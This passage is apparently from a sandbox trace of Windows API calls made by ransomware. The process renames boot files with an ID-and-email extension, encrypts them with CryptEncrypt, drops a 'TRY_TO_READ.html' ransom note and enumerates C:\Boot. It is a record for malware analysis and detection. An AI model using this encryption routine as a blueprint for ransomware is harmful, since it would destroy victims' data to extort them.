returned="C:\\\\BOOTSECT.BAK.12781717671972518758.ex_parvis@aol.com.AIR" [0116.408] MoveFileExW (lpExistingFileName="C:\\\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), lpNewFileName="C:\\\\BOOTSECT.BAK.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\bootsect.bak.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0116.410] CreateFileW (lpFileName="C:\\\\BOOTSECT.BAK.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\bootsect.bak.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.410] GetProcessHeap () returned 0x2e0000 [0116.410] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e4b0 | out: hHeap=0x2e0000) returned 1 [0116.410] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=8192) returned 1 [0116.410] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x2000 [0116.410] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0116.411] GetProcessHeap () returned 0x2e0000 [0116.411] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x30e020 [0116.411] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30e020*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x30e020*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0116.411] WriteFile (in: hFile=0x3d0, lpBuffer=0x30e020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30e020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0116.412] WriteFile (in: hFile=0x3d0, lpBuffer=0x330998*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330998*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0116.412] WriteFile (in: hFile=0x3d0, lpBuffer=0x330998*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330998*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0116.412] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2000) returned 0x34e688 [0116.412] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2000) returned 0x350690 [0116.412] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.412] ReadFile (in: hFile=0x3d0, lpBuffer=0x34e688, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e688*, lpNumberOfBytesRead=0x2acf9c8*=0x2000, lpOverlapped=0x0) returned 1 [0116.413] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.413] WriteFile (in: hFile=0x3d0, lpBuffer=0x350690*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x350690*, lpNumberOfBytesWritten=0x2acf9c8*=0x2000, lpOverlapped=0x0) returned 1 [0116.413] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e688 | out: hHeap=0x2e0000) returned 1 [0116.413] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350690 | out: hHeap=0x2e0000) returned 1 [0116.413] CloseHandle (hObject=0x3d0) returned 1 [0116.414] GetProcessHeap () returned 0x2e0000 [0116.414] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e020 | out: hHeap=0x2e0000) returned 1 [0116.414] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344b98 | out: hHeap=0x2e0000) returned 1 [0116.414] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330998 | out: hHeap=0x2e0000) returned 1 [0116.414] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3445a8 | out: hHeap=0x2e0000) returned 1 [0116.414] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344570 | out: hHeap=0x2e0000) returned 1 [0116.414] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e080 [0116.414] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x344b98 [0116.414] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330998 [0116.414] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x344b98 | out: pbBuffer=0x344b98) returned 1 [0116.414] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330998 | out: pbBuffer=0x330998) returned 1 [0116.414] SetFileAttributesW (lpFileName="C:\\\\bootmgr", dwFileAttributes=0x80) returned 0 [0116.415] lstrlenW (lpString="C:\\\\bootmgr") returned 11 [0116.415] GetProcessHeap () returned 0x2e0000 [0116.415] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x7c) returned 0x328578 [0116.415] lstrcpyW (in: lpString1=0x328578, lpString2="C:\\\\bootmgr" | out: lpString1="C:\\\\bootmgr") returned="C:\\\\bootmgr" [0116.415] lstrcatW (in: lpString1="C:\\\\bootmgr", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\bootmgr.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\bootmgr.12781717671972518758.ex_parvis@aol.com.AIR" [0116.415] MoveFileExW (lpExistingFileName="C:\\\\bootmgr" (normalized: "c:\\bootmgr"), lpNewFileName="C:\\\\bootmgr.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\bootmgr.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0116.416] CreateFileW (lpFileName="C:\\\\bootmgr.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\bootmgr.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.417] GetProcessHeap () returned 0x2e0000 [0116.417] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328578 | out: hHeap=0x2e0000) returned 1 [0116.417] CloseHandle (hObject=0xffffffff) returned 0 [0116.417] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e080 | out: hHeap=0x2e0000) returned 1 [0116.417] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a8f0 | out: hHeap=0x2e0000) returned 1 [0116.417] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344570 [0116.417] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445a8 [0116.417] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.417] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a8a0 | out: hHeap=0x2e0000) returned 1 [0116.417] FindFirstFileW (in: lpFileName="C:\\\\$Recycle.Bin\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x96efd190, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96efd190, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x317b48 [0116.417] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.417] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.417] GetLastError () returned 0x6 [0116.417] SetLastError (dwErrCode=0x6) [0116.417] GetLastError () returned 0x6 [0116.417] SetLastError (dwErrCode=0x6) [0116.417] GetLastError () returned 0x6 [0116.417] SetLastError (dwErrCode=0x6) [0116.417] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.417] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324b98 [0116.417] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.417] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a8a0 [0116.417] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317b88 [0116.417] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317b88 | out: hHeap=0x2e0000) returned 1 [0116.417] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a8a0 | out: hHeap=0x2e0000) returned 1 [0116.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.418] FindNextFileW (in: hFindFile=0x317b48, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x96efd190, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96efd190, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.418] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.418] GetLastError () returned 0x6 [0116.418] SetLastError (dwErrCode=0x6) [0116.418] GetLastError () returned 0x6 [0116.418] SetLastError (dwErrCode=0x6) [0116.418] GetLastError () returned 0x6 [0116.418] SetLastError (dwErrCode=0x6) [0116.418] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.418] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324b98 [0116.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.418] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a8a0 [0116.418] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317b88 [0116.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317b88 | out: hHeap=0x2e0000) returned 1 [0116.418] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a8a0 | out: hHeap=0x2e0000) returned 1 [0116.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.418] FindNextFileW (in: hFindFile=0x317b48, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0116.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.418] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.418] GetLastError () returned 0x6 [0116.418] SetLastError (dwErrCode=0x6) [0116.418] GetLastError () returned 0x6 [0116.418] SetLastError (dwErrCode=0x6) [0116.418] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328578 [0116.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.418] GetLastError () returned 0x6 [0116.418] SetLastError (dwErrCode=0x6) [0116.418] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.418] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3387c0 [0116.419] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.419] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0116.419] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.419] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a8a0 [0116.419] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328a40 [0116.419] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.419] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.419] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.419] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ac8 [0116.419] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.419] GetLastError () returned 0x6 [0116.419] SetLastError (dwErrCode=0x6) [0116.419] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e020 [0116.419] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328ac8 | out: hHeap=0x2e0000) returned 1 [0116.419] GetLastError () returned 0x6 [0116.419] SetLastError (dwErrCode=0x6) [0116.419] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ab48 [0116.419] CreateFileW (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\TRY_TO_READ.html" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0116.420] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ab48 | out: hHeap=0x2e0000) returned 1 [0116.420] WriteFile (in: hFile=0x3d4, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.420] WriteFile (in: hFile=0x3d4, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.421] WriteFile (in: hFile=0x3d4, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.421] CloseHandle (hObject=0x3d4) returned 1 [0116.421] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e020 | out: hHeap=0x2e0000) returned 1 [0116.421] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.421] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.421] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328a40 | out: hHeap=0x2e0000) returned 1 [0116.421] FindNextFileW (in: hFindFile=0x317b48, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96efd190, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96efd190, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96efd190, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.421] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328578 | out: hHeap=0x2e0000) returned 1 [0116.421] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.421] GetLastError () returned 0x0 [0116.421] SetLastError (dwErrCode=0x0) [0116.421] GetLastError () returned 0x0 [0116.421] SetLastError (dwErrCode=0x0) [0116.421] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328578 [0116.421] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.421] GetLastError () returned 0x0 [0116.421] SetLastError (dwErrCode=0x0) [0116.421] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.421] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0116.421] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.421] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.421] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0116.421] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.421] FindNextFileW (in: hFindFile=0x317b48, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96efd190, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96efd190, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96efd190, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.422] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a8f0 [0116.422] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3445a8 | out: hHeap=0x2e0000) returned 1 [0116.422] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a878 | out: hHeap=0x2e0000) returned 1 [0116.422] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a8c8 | out: hHeap=0x2e0000) returned 1 [0116.422] FindFirstFileW (in: lpFileName="C:\\\\Boot\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96efd190, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96efd190, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x317b88 [0116.422] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328578 | out: hHeap=0x2e0000) returned 1 [0116.422] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.422] GetLastError () returned 0x12 [0116.422] SetLastError (dwErrCode=0x12) [0116.422] GetLastError () returned 0x12 [0116.422] SetLastError (dwErrCode=0x12) [0116.422] GetLastError () returned 0x12 [0116.422] SetLastError (dwErrCode=0x12) [0116.422] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445a8 [0116.422] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324b98 [0116.422] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.422] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a8c8 [0116.422] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317bc8 [0116.422] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317bc8 | out: hHeap=0x2e0000) returned 1 [0116.422] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.422] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.422] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a8c8 | out: hHeap=0x2e0000) returned 1 [0116.422] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3445a8 | out: hHeap=0x2e0000) returned 1 [0116.422] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96efd190, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96efd190, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.422] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.422] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.422] GetLastError () returned 0x12 [0116.422] SetLastError (dwErrCode=0x12) [0116.422] GetLastError () returned 0x12 [0116.422] SetLastError (dwErrCode=0x12) [0116.422] GetLastError () returned 0x12 [0116.423] SetLastError (dwErrCode=0x12) [0116.423] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445a8 [0116.423] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324b98 [0116.423] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.423] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a8c8 [0116.423] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317bc8 [0116.423] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317bc8 | out: hHeap=0x2e0000) returned 1 [0116.423] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.423] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.423] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a8c8 | out: hHeap=0x2e0000) returned 1 [0116.423] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3445a8 | out: hHeap=0x2e0000) returned 1 [0116.423] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0116.423] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.423] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.423] GetLastError () returned 0x12 [0116.423] SetLastError (dwErrCode=0x12) [0116.423] GetLastError () returned 0x12 [0116.423] SetLastError (dwErrCode=0x12) [0116.423] GetLastError () returned 0x12 [0116.423] SetLastError (dwErrCode=0x12) [0116.423] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445a8 [0116.423] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.423] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.423] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3445a8 | out: hHeap=0x2e0000) returned 1 [0116.423] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a8c8 [0116.423] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0116.423] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.423] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.423] GetLastError () returned 0x12 [0116.423] SetLastError (dwErrCode=0x12) [0116.423] GetLastError () returned 0x12 [0116.423] SetLastError (dwErrCode=0x12) [0116.423] GetLastError () returned 0x12 [0116.423] SetLastError (dwErrCode=0x12) [0116.423] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445a8 [0116.424] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.424] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.424] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3445a8 | out: hHeap=0x2e0000) returned 1 [0116.424] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445a8 